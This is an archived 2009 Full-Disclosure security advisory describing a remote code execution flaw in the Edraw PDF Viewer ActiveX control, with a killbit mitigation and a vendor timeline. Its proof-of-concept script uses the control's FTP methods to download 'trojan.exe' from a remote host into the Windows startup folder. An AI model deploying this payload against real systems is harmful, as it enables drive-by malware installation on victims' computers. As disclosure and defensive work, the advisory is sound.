Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
From: Jambalaya . (jambalaya.maillistgmail.com)
Date: Thu Jun 18 2009 - 01:30:43 CDT
Edraw PDF Viewer Component ActiveX Remote code execution vulnerability
By Jambalaya of Nevis Labs
Edraw PDF Viewer Component < 184.108.40.206
*other version may also be affected
"Edraw PDF Viewer Component is a light weight ActiveX Control which enables
your application to display and interact with PDF files.It is identical to
Adobe Reader program and adds high speed viewing of PDF documents to your
For more information, see the vendor's site found at the following link:
The specific flaws exists in pdfviewer.ocx ActiveX control.Succssfully
exploiting this vulnerability allows attackers to execute
arbitrary code on vulnerable installation.
The vulnerability exists due to FtpConnect() function, which could download
any file from remote FTP server and put on user's disk.Malicious user could
download trojan and put into "startup" folder so that the trojan will run up
when user's computer restart. Successful exploitation requires that the
target user browse to a malicious web page.
Proof of Concept:
<BR><object classid="clsid:44A8091F-8F01-43B7-8CF7-4BBA71E61E04" id="target"
width="67" height="50" codebase="
target.FtpConnect "ftp://192.168.220.201", "test", "tester"
target.FtpDownloadFile "trojan.exe", "C:\Documents and Settings\All
Set a killbit for this ActiveX.
2009.06.16 Vendor notified via email
2009.06.17 Vendor respond, and release patch
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/